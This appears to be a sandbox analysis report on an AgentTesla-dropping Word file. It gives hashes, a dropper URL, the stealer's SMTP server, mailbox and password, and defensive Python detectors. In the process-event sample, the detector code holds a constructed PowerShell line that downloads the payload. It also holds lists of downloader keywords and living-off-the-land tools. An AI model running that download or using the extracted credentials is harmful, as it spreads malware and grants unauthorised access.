Sales contract.doc

General

Target: Sales contract.doc
Size: 295KB
Sample: 210421-11lyrhlchj
Score: 10/10
MD5: 452e11d23c80550a45b6a498bac85733
SHA1: 1b1355594eecbfad9803e771bedefedf96ecceee
SHA256: 8ac32b7faa79aabd51156f6503e624a53ee5d355d602784273376ad45e7dbdbf
SHA512: fcf7955fe9b6e84e6361a2e0beca3bce9a64d7f413c8629a877e37da016144c4c886ecbf0d61586233aecb15f9215ac0378fc5349ed127465904658af1a3f3a5

Malware Config

Extracted (Language: ps1, deobfuscated)

  URLs
    exe.dropper: httP://katchobinnas.duckdns.org/obi.exe

Extracted (Family: agenttesla)

  Credentials
    Protocol: smtp
    Host: us2.smtp.mailhostbox.com
    Port: 587
    Username: zhoubing.wu.zeruimetal@pppkglobal.net
    Password: Thanks202#
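The two extractions above give a complete set of network indicators for this chain: the dropper URL the PowerShell stage fetches, and the SMTP server and mailbox AgentTesla exfiltrates to. One caveat when turning them into detections: the scheme is written as "httP" in the deobfuscated script, so a byte-exact match against the "http://" a proxy records would miss it; scheme and host are case-insensitive and should be normalised before matching. The following matcher is an added example and not part of the sandbox report. The indicator values are copied verbatim from the config above; the log lines and the 10.0.0.x client addresses are constructed for illustration.

```python
"""IOC matcher for the indicators extracted in the Malware Config section.

Added example, not part of the sandbox report. Indicator values are the
report's own; SAMPLE_LOGS and the client addresses in it are constructed.
"""
import re
from typing import List, Tuple
from urllib.parse import urlsplit

# Indicators exactly as the sandbox extracted them.
DROPPER_URL = "httP://katchobinnas.duckdns.org/obi.exe"  # mixed-case scheme as in the ps1
SMTP_HOST = "us2.smtp.mailhostbox.com"
SMTP_PORT = 587
SMTP_USER = "zhoubing.wu.zeruimetal@pppkglobal.net"


def canonical_url(url: str) -> str:
    """Lower-case scheme and host (both case-insensitive per RFC 3986) and
    drop the scheme's default port, so 'httP://' compares equal to the
    'http://' a proxy or EDR writes into its logs. The path is kept as-is."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    host = p.hostname or ""
    default_port = {"http": 80, "https": 443}.get(scheme)
    netloc = host if p.port in (None, default_port) else f"{host}:{p.port}"
    return f"{scheme}://{netloc}{p.path or '/'}"


DROPPER_HOST = urlsplit(canonical_url(DROPPER_URL)).hostname

# (rule name, compiled pattern). All patterns are case-insensitive because
# log pipelines commonly fold hostnames and e-mail addresses to lower case.
RULES = [
    ("dropper_url", re.compile(re.escape(canonical_url(DROPPER_URL)), re.I)),
    ("dropper_host", re.compile(r"\b" + re.escape(DROPPER_HOST) + r"\b", re.I)),
    ("smtp_host", re.compile(r"\b" + re.escape(SMTP_HOST) + r"\b", re.I)),
    ("smtp_user", re.compile(re.escape(SMTP_USER), re.I)),
]


def match_indicators(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_no, rule_name) for every indicator present on each line.
    A line carrying the full dropper URL is reported once, as dropper_url,
    rather than additionally as dropper_host."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, 1):
        names = [name for name, pat in RULES if pat.search(line)]
        if "dropper_url" in names:
            names = [x for x in names if x != "dropper_host"]
        hits.extend((n, name) for name in names)
    return hits


# Constructed log lines (not from the report) in a generic proxy/DNS/SMTP
# gateway shape; 10.0.0.12 plays the infected client.
SAMPLE_LOGS = [
    "2021-04-21T10:02:13Z proxy client=10.0.0.12 GET http://katchobinnas.duckdns.org/obi.exe 200 301568",
    "2021-04-21T10:02:14Z dns client=10.0.0.12 q=katchobinnas.duckdns.org type=A",
    "2021-04-21T10:02:40Z smtp client=10.0.0.12 server=us2.smtp.mailhostbox.com:587 AUTH LOGIN user=zhoubing.wu.zeruimetal@pppkglobal.net",
    "2021-04-21T10:05:00Z proxy client=10.0.0.13 GET http://example.com/ 200 1234",
]

if __name__ == "__main__":
    for line_no, rule in match_indicators(SAMPLE_LOGS):
        print(f"line {line_no}: {rule}")
```

The smtp_user rule is the most durable of the four: the dropper host is a free DuckDNS name and will rotate, whereas the mailbox the stealer authenticates to is baked into the binary and is what a mail gateway or egress proxy will see in the AUTH exchange on port 587.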

Targets

Target: Sales contract.doc (MD5, SHA1, SHA256, SHA512 and size as listed under General above)
Score: 10/10

Signatures

  • AgentTesla

    Description

    Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, originally written in Visual Basic .NET. It harvests credentials from browsers and mail clients and exfiltrates them; in this sample the exfiltration channel is SMTP, using the server and mailbox listed under Malware Config.

  • Process spawned unexpected child process

    Description

    This typically indicates the parent process was compromised via an exploit or macro. In this chain the document stage hands off to a PowerShell downloader (the ps1 extraction under Malware Config), which fetches the AgentTesla payload from the exe.dropper URL and runs it.

  • AgentTesla Payload

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Loads dropped DLL

  • Suspicious use of SetThreadContext

    Description

    SetThreadContext is the API used to redirect execution in a suspended process; seen together with "Executes dropped EXE" it is the usual footprint of process hollowing or similar injection of the payload into a legitimate-looking host process.
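Two of the signatures above translate directly into host-based detection logic: "Process spawned unexpected child process" is an Office application starting a scripting engine or other living-off-the-land binary, and "Executes dropped EXE" is an image launched from a user-writable directory by that child's process tree. The code below is an added example, not part of the sandbox report and not a description of how the sandbox itself scores. It checks constructed process-creation events shaped like Sysmon Event ID 1 fields; the pids, file paths and the PowerShell command line are invented for illustration (only the URL inside that command line is the one the report extracted).

```python
"""Parent/child and dropped-executable checks matching two signatures in the
report. Added example, not part of the sandbox report; SAMPLE_EVENTS are
constructed (Sysmon Event ID 1 style) and not taken from the analysis."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children an Office document has no legitimate reason to start directly.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
                   "certutil.exe", "bitsadmin.exe", "msbuild.exe"}
# Command-line fragments typical of a one-line downloader stage.
DOWNLOAD_HINTS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                  "net.webclient", "start-bitstransfer", "-enc", "encodedcommand",
                  "frombase64string")
# Path fragments that mark a user-writable location (lower-cased comparison).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """File name component of a Windows path, lower-cased for set lookups."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawn_severity(ev: ProcEvent) -> Optional[str]:
    """'Process spawned unexpected child process': Office parent, scripting or
    LOLBin child. Severity rises to high when the command line looks like a
    downloader, which is the stage this report's ps1 extraction represents."""
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return None
    if basename(ev.image) not in SCRIPT_CHILDREN:
        return None
    cl = ev.command_line.lower()
    return "high" if any(h in cl for h in DOWNLOAD_HINTS) else "medium"


def detect(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, finding, severity). Stage 1 flags Office-spawned script
    hosts; stage 2 ('Executes dropped EXE') flags any process whose image sits
    in a user-writable directory and whose ancestry includes a stage-1 pid."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    flagged: Dict[int, str] = {}
    hits: List[Tuple[int, str, str]] = []
    for ev in events:
        sev = office_spawn_severity(ev)
        if sev:
            flagged[ev.pid] = sev
            hits.append((ev.pid, "office_spawn", sev))
    for ev in events:
        if ev.pid in flagged:
            continue
        if not any(m in ev.image.lower() for m in USER_WRITABLE):
            continue
        seen = set()  # guards against pid reuse producing a cycle
        ppid = ev.ppid
        while ppid in by_pid and ppid not in seen:
            if ppid in flagged:
                hits.append((ev.pid, "dropped_exe", "high"))
                break
            seen.add(ppid)
            ppid = by_pid[ppid].ppid
    return hits


WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events: pids, paths and the command line are invented.
SAMPLE_EVENTS = [
    ProcEvent(4120, 3004, WINWORD, EXPLORER, f'"{WINWORD}" /n "C:\\Users\\bob\\Downloads\\Sales contract.doc"'),
    ProcEvent(5200, 4120, PS, WINWORD,
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
              "'httP://katchobinnas.duckdns.org/obi.exe', $env:TEMP + '\\obi.exe')\""),
    ProcEvent(6008, 5200, r"C:\Users\bob\AppData\Local\Temp\obi.exe", PS, r"C:\Users\bob\AppData\Local\Temp\obi.exe"),
    ProcEvent(6100, 3004, r"C:\Windows\System32\notepad.exe", EXPLORER, "notepad.exe"),
    ProcEvent(7000, 3004, PS, EXPLORER, "powershell.exe Get-Process"),  # admin use, not flagged
]

if __name__ == "__main__":
    for pid, finding, severity in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {finding} ({severity})")
```

The ancestry walk is what keeps stage 2 from firing on every installer a user runs from Downloads: an executable in a user-writable path is only reported when a flagged Office-spawned script host is somewhere above it in the process tree.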

Related Tasks

MITRE ATT&CK Matrix

Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation (no techniques are listed under them in this report).

Tasks

static1
behavioral2
10/10